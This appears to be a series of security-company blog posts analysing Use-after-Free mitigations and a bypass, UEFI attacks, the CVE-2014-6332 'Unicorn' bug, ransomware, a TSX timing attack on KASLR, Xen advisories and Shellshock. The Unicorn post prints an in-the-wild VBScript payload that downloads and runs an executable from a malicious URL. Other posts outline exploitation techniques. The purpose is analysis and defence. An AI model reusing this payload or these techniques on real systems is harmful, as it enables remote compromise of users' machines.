January 17, 2015 / Jared DeMott

Use-after-Free: New Protections, and how to Defeat them

The Problem

Memory corruption has plagued computers for decades, and these bugs can often be transformed into working cyber-attacks. Memory corruption is a situation in which an attacker (a malicious user of an application or network protocol) is able to send data that is improperly processed by native code. That can lead to changes in important control structures that give the attacker unexpected influence over the path a program will take.

High-level protections, such as anti-virus (AV), have done little to stop the tide, because AV is poor at reacting to threats that are not on its list of known attacks. Recent low-level operating system (OS) protections have helped: non-executable memory and code module randomization prevent attackers from leveraging memory corruption bugs by stopping injected code from successfully executing.

Yet a newer memory corruption exploit technique called return-oriented programming (ROP) has survived these defenses. ROP operates by leveraging existing code in memory to undo non-executable memory protections. New medium-level defenses, such as Microsoft’s anti-ROP add-on EMET, have helped somewhat. But a particularly troublesome bug class known as Use-after-Free (UaF) has been applied in conjunction with other techniques to bypass EMET (see prior blog HERE). UaFs have been the basis of many recent cyber-attacks, including Operation SnowMan (CVE-2014-0322) and Operation Clandestine Fox (CVE-2014-1776). Thus, it is clear that further low-level mitigations are required.

The Solution

To address the problem of UaF attacks, browser vendors have implemented new protections within the browser process. A UaF happens when (1) a low-level data structure (called an object in C++) is released prematurely, (2) an attacker knows about this release and quickly fills that space with data they control, and (3) a dangling reference to the original object, which another part of the program assumes is still valid, is used. But of course, unbeknownst to the program, the attacker has changed the object’s data. The intruder can now leverage the influence afforded by the corrupted memory state to hijack the compromised program.
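The three-step sequence above can be modeled with a toy allocator. This is purely illustrative (real UaF bugs corrupt native C++ objects, not Python dicts), but it shows why slot reuse turns a dangling reference into attacker influence:

```python
# Toy heap: a list of slots; a "pointer" is just a slot index.
class ToyHeap:
    def __init__(self):
        self.slots = []

    def alloc(self, data):
        # Reuse the first free slot, like a real allocator's free list would.
        for i, slot in enumerate(self.slots):
            if slot is None:
                self.slots[i] = data
                return i
        self.slots.append(data)
        return len(self.slots) - 1

    def free(self, ptr):
        self.slots[ptr] = None

    def read(self, ptr):
        return self.slots[ptr]

heap = ToyHeap()
obj = heap.alloc({"vtable": "legit_functions"})   # program creates an object
dangling = obj                                    # another component keeps a reference
heap.free(obj)                                    # (1) premature release
heap.alloc({"vtable": "attacker_functions"})      # (2) attacker refills the slot
hijacked = heap.read(dangling)                    # (3) dangling reference is used
print(hijacked["vtable"])                         # -> attacker_functions
```

The program still "sees" an object at the old location, but its contents (here, the vtable field) are now attacker-chosen.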

Microsoft chose to tackle this serious UaF problem with two new protections, which work together to stop attackers from being able to allocate new data in the spot where a dangling reference points. They call the new protections Heap Isolation and Delayed Free. The premise of these protections is simple. Heap Isolation creates a new heap. (A heap is a place that a program uses to create and free internal data as needed throughout execution.) This new isolated heap houses many internal Internet Explorer objects, while objects likely to be under the influence of attackers (like strings created via JavaScript) are still allocated on the typical default heap. Thus, if a UaF condition appears, the attacker should not be able to replace the memory behind the dangling pointer with malicious data. We could liken this situation to forcing naughty school kids to use a separate playground from the trusted kids. But who is naughty and who is good? An obvious weakness of this approach is that, with the many different objects used in a complex program like a browser, it is difficult for developers to perfectly separate the two groups of objects.

So Microsoft also created a second clever protection. Delayed Free operates by not releasing an object’s memory right away. In our analogy, if we assume the goal of the naughty kid is to steal the place in line of a good kid who unexpectedly stepped out of line, we can think of this protection as the playground teacher watching that place in line for a while before the slot is finally opened. Even though the program has asked the allocator to free a chunk of memory, the object is not freed, but is instead put on a list to be freed later, when the playground looks safer. That way, even if an attacker knows of an object type on either heap that could be used to replace the memory backing a dangling reference, they cannot use it, since the memory has not actually been freed yet. The memory will not be truly freed until the following conditions are met: there are no references to the object on the stack, and either at least 100,000 bytes are waiting to be freed or the per-thread call stack has fully unwound to its original starting point.
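The deferred-free policy can be sketched as a small model. The threshold and the two release conditions come from the description above; everything else (names, structure) is an assumption for illustration, not Microsoft's actual implementation:

```python
class DeferredFreeAllocator:
    """Toy model of Delayed Free: free() only queues the chunk; memory is
    actually released later, when the conditions described above hold."""
    THRESHOLD = 100_000  # bytes pending before a flush is considered

    def __init__(self):
        self.pending = []        # (ptr, size) tuples waiting to be freed
        self.pending_bytes = 0
        self.really_freed = set()

    def free(self, ptr, size):
        self.pending.append((ptr, size))
        self.pending_bytes += size

    def maybe_flush(self, stack_refs, call_stack_depth):
        # Conditions from the text: no stack references, AND either enough
        # bytes are pending or the thread's call stack fully unwound.
        if stack_refs:
            return 0
        if self.pending_bytes >= self.THRESHOLD or call_stack_depth == 0:
            freed = len(self.pending)
            for ptr, _ in self.pending:
                self.really_freed.add(ptr)
            self.pending.clear()
            self.pending_bytes = 0
            return freed
        return 0

heap = DeferredFreeAllocator()
heap.free(ptr=0x1000, size=0x40)
# An attacker allocating right after the free cannot reclaim 0x1000 yet:
assert 0x1000 not in heap.really_freed
heap.maybe_flush(stack_refs=0, call_stack_depth=0)  # thread fully unwound
assert 0x1000 in heap.really_freed
```

The point of the model: the window between free() and the real release is exactly what the attacker loses, unless they can keep a reference alive past it (the "long lived" dangling pointer discussed below).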

Evaluation

Though the new protections are definitely helpful, and I even recommend applying them to other applications, no native mitigation is enough. If we look back at the history of memory corruption, we see that every time vendors put forth a new OS security measure, it worked in slowing attackers for a season, but before long each mitigation was bypassed by some clever new attack.

In my research, I show that one such bypass against these new protections involves using what I call a “long lived” dangling pointer. In my naughty-child analogy, we can think of this as the sneaky and patient child who can go to either playground and will wait for just the right moment before slipping ahead in line. In more technical terms, if an attacker can locate a UaF bug in code that maintains a heap reference to the dangling pointer, the conditions to actually free the object under the deferred-free protection can be met (no stack references, or the call chain eventually unwinds). And finding useful objects in either playground to replace the original turns out not to be that difficult either. I wrote a Python script to search the core Internet Explorer code module (MSHTML.dll). The script finds the different objects and their sizes, and notes whether each is allocated on the default or the isolated heap. This information can be used to help locate useful objects to attack either heap. And with a memory garbage collection process known as coalescing, the replacement object does not even have to be the same size as the original. This is useful for changing critical data (like the vtable pointer) at the proper offset in what was the original object. The Python code is HERE. For complete details on this research, please see the slides from my January 17th ShmooCon talk HERE.
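A minimal sketch of the idea behind such a script: scan a text disassembly of MSHTML.dll (e.g. exported from a disassembler) for allocator call sites and record the requested size and which heap handle is used. The listing format, register conventions, and symbol names (g_hDefaultHeap, g_hIsolatedHeap) are assumptions for illustration; this is not the actual script linked above:

```python
import re

# Match an allocation call site: a pushed size, then a pushed heap handle
# (default or isolated), then the call to HeapAlloc.
ALLOC_RE = re.compile(
    r"push\s+(?P<size>0x[0-9a-fA-F]+).*?"
    r"push\s+\[(?P<heap>g_hDefaultHeap|g_hIsolatedHeap)\].*?"
    r"call\s+HeapAlloc",
    re.DOTALL,
)

def find_allocations(listing: str):
    """Return (size, heap) pairs for each allocator call site found."""
    return [(int(m.group("size"), 16), m.group("heap"))
            for m in ALLOC_RE.finditer(listing)]

# Synthetic listing standing in for real disassembly output:
demo = """
push 0x58
push [g_hIsolatedHeap]
call HeapAlloc        ; some internal IE object, isolated heap
push 0x30
push [g_hDefaultHeap]
call HeapAlloc        ; attacker-reachable buffer, default heap
"""
print(find_allocations(demo))
# -> [(88, 'g_hIsolatedHeap'), (48, 'g_hDefaultHeap')]
```

Grouping the results by heap and size is then enough to shortlist candidate replacement objects for a given dangling pointer.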

January 6, 2015 / Rafal Wojtczuk

CCC31 talk about UEFI security

Recently, Corey Kallenberg and I presented a talk at the 31st Chaos Communication Congress titled “Attacks on UEFI security”. We described (and demoed) vulnerabilities allowing us to achieve write access to the flash chip (which stores UEFI code) and to SMM memory (which holds the code for the all-powerful System Management Mode). The CERT vulnerability notes are here, here and here; you are also encouraged to read the presentation, the whitepaper and the second whitepaper.
TL;DR-style, these vulnerabilities are useful for an attacker who already has administrative privileges in the operating system and wants to install a UEFI-based or SMM-based rootkit. So no, the sky is not falling, and this type of attack is not often seen in the wild. Yet a few well-known cases exist, and as the topic has gained considerable attention recently, there may be more in the future.

December 4, 2014 / Mantej Singh Rajpal

CVE-2014-6332: Life is all Rainbows and Unicorns

Though just patched earlier this month, the CVE-2014-6332 vulnerability shares its age with Yahoo, Neopets, and the hit TV show Friends. This Windows vulnerability, also known as the “Unicorn” bug, has been exploited in the wild with the help of a Visual Basic Script. It impacts almost every version of Microsoft Windows from Windows 95 onwards, and can be exploited in Internet Explorer versions 3 to 11, inclusive. This complex vulnerability gets its name from being extremely rare, somewhat like a unicorn. After all, it’s not every day you come across a unicorn galloping through your front yard.

A lot has already been said about this vulnerability. The bug is caused by the IE VBScript engine not handling the re-sizing of an array properly. By abusing this, one can achieve remote code execution, bypassing protections such as DEP and ASLR. To explain the vulnerability in a nutshell: there exists a control flow such that if you request to re-size an array and an error occurs (e.g. OutOfMemoryError), the new size is kept (as opposed to being reset). After triggering the vulnerability, you can access the out-of-bounds elements of the array. The exploit then uses this to perform type confusion. The original IBM Security Intelligence article describes the bug in great detail, and a Trend Micro blog walks through the PoC.
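The flawed control flow can be modeled with a toy Python class (purely illustrative; nothing here is the actual VBScript engine code). The key is that the size field is updated before the reallocation and never rolled back when the reallocation fails:

```python
class VBArray:
    """Toy model of the bug: bounds checks consult a size field that is
    updated before reallocation and left stale when reallocation fails."""
    def __init__(self, n):
        self.storage = [0] * n
        self.size = n              # what bounds checks consult

    def redim(self, new_size, fail=False):
        self.size = new_size       # size updated first...
        if fail:
            raise MemoryError      # ...and never rolled back on error
        self.storage = (self.storage[:new_size]
                        + [0] * (new_size - len(self.storage)))

    def get(self, i):
        if i >= self.size:         # check passes for stale, too-large size
            raise IndexError("out of bounds")
        # In the real engine this read walks past the backing storage;
        # Python would raise instead, so we only assert the mismatch below.
        return self.storage[i]

arr = VBArray(4)
try:
    arr.redim(32, fail=True)       # resize hits an OutOfMemory-style error
except MemoryError:
    pass
# Bounds checks now allow indices 0..31 while storage holds only 4 slots:
assert arr.size == 32 and len(arr.storage) == 4
```

That mismatch between the checked size and the real storage length is the out-of-bounds primitive the exploit turns into type confusion.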

Once type confusion is achieved, one could adopt Yang Yu’s approach of leaking memory addresses using BSTR. An attacker would just need to change the array’s element type to BSTR and then corrupt its header. This essentially allows any memory address to be leaked, easily letting an attacker determine the location of COleScript – an object holding safety flags for the VB interpreter. Normally, some VB functionality, such as file system interaction and program launching, is restricted in the browser. However, resetting the respective flag allows an attacker to operate within IE as if it were a standalone VB shell.

In fact, the PoC is so straightforward that using it is trivial – one just needs to swap in their VB payload and it’s ready to ship for exploit kits and drive-by campaigns. Last week, we got hold of a Fiddler capture of a malicious web page exploiting this vulnerability.

The VB payload was obfuscated and hidden in a JavaScript snippet on the same page:

[image: obfuscated_payload]

The de-obfuscated payload looks like this:

<SCRIPT LANGUAGE="VBScript">
  set shell=createobject("Shell.Application")
  shell.ShellExecute "cmd.exe", " /c echo Set Post = CreateObject(""Msxml2.XMLHTTP"")
  >> c:\\nb.vbs & echo Set Shell = CreateObject(""Wscript.Shell"")
  >> c:\\nb.vbs & echo Post.Open ""GET"", "&nbnburl&" ,0
  >> c:\\nb.vbs & echo Post.Send()
  >> c:\\nb.vbs & echo Set aGet = CreateObject(""ADODB.Stream"")
  >> c:\\nb.vbs & echo aGet.Mode = 3
  >> c:\\nb.vbs & echo aGet.Type = 1
  >> c:\\nb.vbs & echo aGet.Open()
  >> c:\\nb.vbs & echo aGet.Write(Post.responseBody)
  >> c:\\nb.vbs & echo aGet.SaveToFile ""c:\\zl.exe"",2
  >> c:\\nb.vbs & echo wscript.sleep 1000
  >> c:\\nb.vbs & echo Shell.Run (""c:\\zl.exe"")
  >> c:\\nb.vbs & echo Set fsox = CreateObject(""Scripting.Filesystemobject"")
  >> c:\\nb.vbs & echo fsox.DeleteFile(WScript.ScriptFullName)
  >> c:\\nb.vbs & c:\\nb.vbs"
  </SCRIPT>

After the payload launches a shell, it connects to nbnburl (a link to a malicious exe). The server response is saved in the C:\ drive as zl.exe, which is then executed.

It should be noted that during our testing phase, the exploit didn’t work every single time. We conducted a series of experiments where we ran our exploit 25 times, and recorded how many runs resulted in a shell. Our observations indicate success rates ranging from 8/25 to 25/25. Of course, a better experiment could be designed, offering more statistically accurate results. In our case, we were testing to see if the exploit was 100% stable. Turns out, it isn’t. The one exception is IE 11 with enhanced protected mode, which thwarted the Unicorn exploit 25/25 times! EPM is disabled by default due to several compatibility issues, so users must manually enable it under Settings->Internet Options->Advanced, and check “Enable Enhanced Protected Mode” under Security.

For Bromium customers, this attack isn’t any different from other drive-by-downloads – the attack will be isolated and the following LAVA graph will be recorded:

[image: cve_2014_6332_LAVA_graph]

This bug really is a special one – it’s reasonably stable, it bypasses the security mechanisms implemented in the latest Windows systems, and it doesn’t require any 3rd-party plugins (such as the Java Runtime). Therefore, its impact is going to be enormous, since it’s unlikely that all users will instantly update their systems.

The question now is, wouldn’t it be safer to simply disable all backwards compatibility features and get rid of the legacy software? The easy answer is yes, but if we scrutinize this matter a bit we can see that it’s not that straightforward. Backwards compatibility is there for a reason – if a software update changes the workflow of an application, users must be given an option to return to their old setup. This minimizes failures that could be caused by the patches.

Unfortunately, there’s no easy solution, and software update management is a huge problem today. Isolation is one viable way to address this issue.

November 19, 2014 / Vadim Kotov

Would you like some encryption with your turkey?

Crypto-ransomware continues to grow and mutate. Yet another family, called CoinVault, popped up the other day. Like Cryptographic Locker, it is a .NET application; it is not as advanced as CryptoLocker or CryptoWall, but it apparently does its job reasonably well.
We were recently wondering: are there any trends in crypto-ransomware? How does the threat evolve over time, and is there any connection between the gangs? So we wrote a report that summarizes our analysis of six ransom Trojans:

  • Dirty Decrypt
  • CryptoLocker
  • CryptoWall / CryptoDefense
  • Critroni/CTB Locker
  • TorrentLocker
  • Cryptographic Locker

We looked at nearly 30 samples and here are the main findings of the research:

  • The latest families target a huge number of enterprise file formats from documents and images to CAD files and financial data instead of just common consumer file types.
  • Crypto-ransomware uses every possible attack vector to get into victim machines.
  • The samples analyzed use fairly complex obfuscation and covert launch techniques that allow them to evade detection in the early stages of infection.
  • Communication with command and control servers is encrypted and extremely hard to spot in the network traffic.
  • Cryptography used in the samples analyzed is for the most part implemented correctly and encrypted files are impossible to recover without a key.
  • All recent ransomware accepts payments in Bitcoins only. Apparently there’s a good way of laundering BTC or maybe even a service on the black market.
  • Crypto-ransomware matures and evolves from version to version, additional features are added to ensure that files are impossible to recover (e.g. deleting shadow copies) and flaws are getting fixed.

This threat won’t go away: as long as people pay the ransom, new ransomware families will appear. For a detailed analysis of the aforementioned families, read the full report.

Bromium customers should not worry about this threat, since we’re able to isolate crypto-ransomware and prevent it from accessing the file system. If a crypto-enabled piece of malware successfully executes inside the micro-VM, LAVA will produce an attack graph that looks like this:

[image: graph]

 

LAVA provides full details of the ransomware activity, the vector used to attack the system, and the location of the attacker’s C&C server. We will continue to track developments with these types of attacks and will provide additional information as it becomes available.

October 27, 2014 / Rafal Wojtczuk

TSX improves timing attacks against KASLR

Mega biblion mega kakon (“a big book is a big evil”)…

… and similarly a long blog is a nuisance, so I managed to squeeze the essence of it into a single sentence, the title. If it is not entirely clear, read on.

SMEP

A typical privilege escalation exploit based on a kernel vulnerability works by corrupting kernel memory in a way advantageous to the attacker. Two scenarios are possible:

  1. arbitrary code execution in kernel mode
  2. data-only; just alter kernel memory so that privileges are elevated (e.g. change the access token of the current process)

Usually, the first method is the most straightforward and the most flexible. With SMEP enabled, an attacker cannot simply divert kernel execution into code stored in usermode pages; more work is needed, a generic method being ROP within the kernel body.

Kernel ASLR

Usually, both of the above methods require some knowledge of the kernel memory layout. In particular, in order to build a ROP chain in the kernel body, we need to know the base of the kernel or of a driver. In Windows 8.1, significant changes were introduced so as not to give the attacker the memory layout for free. They affect only processes running with integrity level lower than medium, but that is the most interesting case, as OS-based sandboxes encapsulate untrusted code in such processes. The effectiveness of Windows 8.1 KASLR depends on the type of vulnerability primitive available to the attacker:

  1. If one can read and write arbitrary address with arbitrary contents multiple times, there is no problem, as one can learn the full memory layout.
  2. If one can overwrite an arbitrary address with arbitrary content at least twice, then a generic method is to overwrite the IDT entry for interrupt Y with usermode address X (note the IDT base can be obtained via the unprivileged sidt instruction), and then change the type of the page holding X so that it becomes a supervisor page (possible because page table entries are at a known location). Finally, trigger code execution with an int Y instruction. I assume this is the message of this post, although it does not discuss how to locate a kernel code pointer (meaning, beat KASLR) that should subsequently be overwritten. In some cases we do not need to know the address of the kernel code pointer, e.g. if it lives in an area that we can overflow or alter under a use-after-free condition.
  3. If one can just control a kernel function pointer, then… We can divert execution neither to usermode (because of SMEP) nor to kernelmode (because of KASLR we do not know addresses of any ROP gadget). Any hints?

Recently I played with a vulnerability from the third category, and (at least for me) KASLR provided significant resistance. It can be argued that there is potential for kernel bugs that leak some pointers and thus allow KASLR to be bypassed, but something more generic would be better.

Timing attacks against KASLR

An excellent paper describes methods to bypass KASLR via timing attacks. One of the discussed methods is: in usermode, access kernel address X, and measure the time elapsed until the usermode exception handler is invoked. The point is that even though a usermode access to X throws a page fault regardless of whether X is in mapped kernel memory or not, the timings are different. Once we recover the list of mapped pages, we can infer the kernel base (or some driver base) and consequently the addresses of useful code snippets in it – all we need to build a ROP chain.

Timing attacks need to take care of the inherent noise. Particularly, on Windows invoking the usermode exception handler requires a lot of CPU instructions, and the difference in timing can be difficult to observe. It would be much better if the probing did not result in the whole kernel page fault handler executing. Any hints?

TSX to the rescue

Haswell Intel CPUs introduced the “transactional synchronization extensions” (TSX). This means that only recent CPUs support them; moreover, Intel has recommended disabling them via a microcode update, as they are apparently not reliable. Yet we may assume that someday they will be fixed and become widespread.

TSX makes kernel address probing much faster and less noisy. If an instruction executed within an XBEGIN/XEND block (in usermode) tries to access kernel memory, no page fault is raised – instead, a transaction abort happens, so execution never leaves usermode. On my i7-4800MQ CPU, the relevant timings, in CPU cycles, are (minimum/average/variance, 2000 probes, top half of results discarded):

  1. access in TSX block to mapped kernel memory: 172 175 2
  2. access in TSX block to unmapped kernel memory: 200 200 0
  3. access in __try block to mapped kernel memory: 2172 2187 35
  4. access in __try block to unmapped kernel memory: 2192 2213 57

The difference is visible to the naked eye; an attack using TSX is much simpler and faster.
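Given cycle counts like those in the table above, classifying an address as mapped or unmapped reduces to a threshold test. The probe itself requires native XBEGIN/XEND code and the exact numbers vary per CPU; this sketch only shows the classification step, using the averages measured above:

```python
# TSX-probe averages from the table above (i7-4800MQ): mapped ~175 cycles,
# unmapped ~200. A midpoint threshold separates the two cases.
MAPPED_AVG, UNMAPPED_AVG = 175, 200
THRESHOLD = (MAPPED_AVG + UNMAPPED_AVG) // 2   # 187 cycles

def classify(samples):
    """Compare the median sample against the threshold; the median resists
    the occasional slow outlier (interrupt, cache miss)."""
    s = sorted(samples)
    median = s[len(s) // 2]
    return "mapped" if median < THRESHOLD else "unmapped"

print(classify([172, 174, 310, 175, 173]))   # -> mapped
print(classify([200, 200, 201, 420, 200]))   # -> unmapped
```

Sweeping this test over the candidate kernel address range yields the list of mapped pages, from which the kernel or driver base can be inferred.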

Two points as a take-away:

  1. KASLR can be bypassed in an OS-independent way; this post describes how the existing techniques can be improved by utilizing TSX instructions.
  2. The attack is possible because of the shared address space between kernel and usermode. A hypervisor has a separate address space, and therefore it is not prone to similar attacks.
October 1, 2014 / Rafal Wojtczuk

Musings on the recent Xen Security Advisories

As all careful readers of this blog certainly know, the Bromium vSentry hypervisor (uXen) is derived from Xen. This means parts of the codebase are shared between the two projects, and vulnerabilities found in Xen are sometimes relevant to uXen. The two recent Xen Security Advisories, XSA-105 and XSA-108, are not particularly severe (at least for vSentry), but feature interesting details related to generic hypervisor hardening that are worth discussing. One may wish to read the original Xen advisories before proceeding.

XSA-105

The title of the advisory is “Missing privilege level checks in x86 HLT, LGDT, LIDT, and LMSW emulation”. The impact (for Xen) is the ability of unprivileged VM usermode code to elevate to VM kernel.
In some scenarios, when the CPU cannot execute an instruction in a VM properly (e.g. because the instruction touches a memory-mapped register and has a device-specific side effect), Xen emulates the instruction. The problem is that the code responsible for emulating the above instructions did not check whether the CPU was in kernel mode. LGDT and LIDT in particular are normally available to kernel mode only, as they change crucial CPU registers. Because of the vulnerability, a user process in a VM (even one with very low privileges, e.g. Untrusted integrity level in the case of Windows) could effectively execute LIDT or LGDT and take full control of the VM.

Exploitation is straightforward in the case of Windows 7: one can just create a fake IDT table in usermode, and the kernel will transfer control to the attacker’s code (residing in usermode pages) upon the first interrupt. On Windows 8 running on a CPU featuring SMEP, an attacker needs to do a bit more work and create a ROP chain in the kernel – fortunately for the attacker, at the entry to the [software] interrupt handler all general-purpose registers are controllable, so it is easy to achieve the stack pivot.

It is remarkable that, in fact, no sane OS needs these instructions to be emulated in normal circumstances. Still, a complete emulator imported into Xen is available throughout a VM’s lifetime, resulting in a vulnerability. In the early days of uXen development, it was recognized that the emulator constitutes an attack vector, and a conscious effort was made to reduce the number of supported instructions. Therefore, uXen is not vulnerable – when an exploit is run in a vSentry microVM, the emulation is denied, with the message
(uXEN) c:/br/bld/uxen/xen/uxen/arch/x86/x86_emulate/x86_emulate.c:1383:d187 instruction emulation restricted for twobyte-instruction 0x1
in the logs, and the microVM is killed.

To sum up, Xen users should worry about this vulnerability if they run untrusted code in their VMs (think sandboxed code) and care about privilege elevation within VM. uXen is not affected.

XSA-108

The title of the advisory is “Improper MSR range used for x2APIC emulation”. The impact is that a malicious VM kernel can crash Xen or read up to 3K of its memory, from an address that is not under the attacker’s control.

The root cause is that the code responsible for emulating access to local APIC registers in x2APIC mode supported 1024 registers, but allocated buffer space for only 256 registers. If a write access (via the wrmsr instruction) is requested by the VM, no harm is done, as only a limited number of known registers are actually emulated. On the other hand, the code implementing read access emulation just reads from the vlapic->regs buffer (which is one page long) at an offset controlled by the attacker (it must only be less than 16K).
Consequently, memory located up to 12K past the end of the vlapic->regs buffer is read and returned to the VM. More precisely, 4-byte integers located at 16-byte-aligned addresses can be read. If the virtual addresses adjacent to the vlapic->regs buffer are unmapped, this results in a Xen crash; if they are mapped, their contents leak to the VM.
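The arithmetic behind the out-of-bounds read can be checked with a short sketch. The constants come from the description above (1024 accepted registers, a one-page buffer, 16-byte register stride); the emulator itself is C, so this only verifies the bounds mismatch:

```python
# Sketch of the bounds mismatch: x2APIC registers are exposed as MSRs
# starting at 0x800, and register i lives at byte offset i * 16. The
# flawed check accepted 1024 registers, while vlapic->regs is one page.
X2APIC_BASE = 0x800
PAGE_SIZE = 4096
ACCEPTED_REGS = 1024           # what the flawed range check allowed
BUFFER_REGS = PAGE_SIZE // 16  # 256 registers actually backed by the page

def read_offset(msr):
    index = msr - X2APIC_BASE
    assert 0 <= index < ACCEPTED_REGS, "rejected by the (flawed) range check"
    return index * 16          # byte offset into vlapic->regs

# The last accepted MSR reads 12K past the end of the one-page buffer:
worst = read_offset(X2APIC_BASE + ACCEPTED_REGS - 1)
print(worst, worst - (PAGE_SIZE - 16))   # -> 16368 12288
```

So attacker-controlled offsets range over 16K while only the first 4K is backed, matching the "up to 12K past the buffer" figure above.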

The vulnerable code is present in uXen. uXen uses a specialized memory manager (dubbed “memcache”) that preallocates a large contiguous virtual memory range for the purpose of mapping VM-related pages. As a result, a uXen crash is unlikely; it can happen only when the vlapic->regs buffer is mapped near the end of the memcache.
Similarly, the information leak is somewhat restricted – the memcache stores only pages allocated for uXen purposes, therefore (if we neglect the unlikely “end of memcache” scenario) there is no possibility of unrelated host kernel memory leaking to the microVM. In the common case, the memcache assigns consecutive virtual addresses to subsequent page allocations. During microVM setup, the order of allocation is such that the three pages allocated immediately after the vlapic->regs allocation store the VMCS, VMCS shadow and MSR bitmap pages. Therefore, in the common case, all the attacker can achieve is leaking the lower 32 bits of pointers from the VMCS, which might help to deduce the ASLR layout of the host kernel. This is not a catastrophic problem in itself, but it can aid in the exploitation of another, unrelated vulnerability. In a corner case where microVM creation races with heavy map/unmap operations done on another microVM’s memory, that memory could leak to the attacker as well.

To sum up, this vulnerability has the potential to crash the whole hypervisor or leak a limited amount of data from it. This is not a very severe impact, although if one runs multiple VMs of different origin on the same host and is very serious about the possibility of data leaking from one VM to another (even a small amount, from a location not controlled by the attacker), prompt patching is justified. Interestingly, there was quite some concern in the media about this vulnerability, but it was clearly overhyped.

Interestingly, vSentry microVMs use xAPIC mode, not x2APIC mode, and the vulnerability can be exploited only in x2APIC mode. This means that an attacker needs to enable x2APIC mode first. However, doing so leaves the microVM OS unable to use the APIC, and it hangs in IPI processing. In order to exploit this vulnerability repeatedly for more than a few seconds, an attacker would need to patch the VM OS to use the APIC in x2APIC mode, which is far from trivial, yet imaginable.
It also means we missed a generic hardening opportunity – we should support only a single APIC mode. There is still room for improvement, but considering that since the release of the first vSentry version there has been no vulnerability in Xen allowing escape from a VM that would affect us, it looks like we have done a fairly decent job.

September 26, 2014 / Jared DeMott

The Mysterious Life of Benjamin Bash

In a time of shaggy beards, thick glasses, and bell bottomed trousers, was Bourne[i] a way to command the beasty called Unix.  But as is always the way with humans, enough is never enough.  As such, a fancier champion Bashed[ii] onto the scene.  And for many years, Mr. Benjamin Bash served rich and poor alike, in the kitchens of Apache[iii] and countless other dens[iv].

Now as always, dragon slayers[v] comb our lands, searching for kingdom weaknesses.  And of course, our faithful Mr. Bash was never considered a fault.  But his obscure injection[vi] wouldn’t lie dormant forever.  Nay!  One brave warrior, Sir Chazelas[vii], discovered that when ye place an order with lovely CGI[viii] maids, one can also pass an environment[ix] note, which causes Mr. Bash to do unexpected things.  Indeed, in vulnerable establishments, Bash will do whatever ye ask[x].  Even hand over the keys to the castle!  Aye, it’s a sad affair, with grave consequences[xi].

But take heart laddie, and listen up.  We’ve vital information.  Examine the following attack:

[image: bashsmah_pic_2]

The smart student would note that for the agent of doom to achieve its nefarious function[xii], some key bits must transfer across our moat[xiii].  The evil parts of the message are the characters “() {“.  I say, our border guards[xiv] should be informed about the matter.  And better yet, we should hastily patch[xv] Mr. Bash to ensure he acts properly, and ignores such outsider suggestions.  Sadly some of our smaller holds[xvi] may not receive the message for some time, if ever.

So, with this unsavory matter behind us, the mysterious life of Mr. Bash goes on.  But the enemy forces are wily.  They’re schemin’ and plotting as always.  I say let’s do a thorough run down of our defenses, check the checkers, and make sure we’re ready when next our dastardly foes return.

 

Protip: Article best read aloud with a pint and a thick Irish or Scottish accent

[i] http://en.wikipedia.org/wiki/Bourne_shell

[ii] http://en.wikipedia.org/wiki/Bash_(Unix_shell)

[iii] http://en.wikipedia.org/wiki/Apache_HTTP_Server

[iv] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

[v] http://www.alienvault.com/blogs/security-essentials/the-life-of-a-security-researcher

[vi] http://en.wikipedia.org/wiki/Code_injection

[vii] https://lists.debian.org/debian-security-announce/2014/msg00220.html

[viii] http://en.wikipedia.org/wiki/Common_Gateway_Interface

[ix] http://en.wikipedia.org/wiki/Environment_variable

[x] http://shellshock.brandonpotter.com/

[xi] http://www.scmagazine.com/linux-and-os-x-flaw-may-have-greater-impact-than-heartbleed/article/373743/

[xii] http://unix.stackexchange.com/questions/157329/what-does-env-x-command-bash-do-and-why-is-it-insecure

[xiii] http://en.wikipedia.org/wiki/Trust_boundary

[xiv] https://www.owasp.org/index.php/Web_Application_Firewall

[xv] https://bugzilla.redhat.com/show_bug.cgi?id=1141597

[xvi] http://en.wikipedia.org/wiki/Internet_of_Things
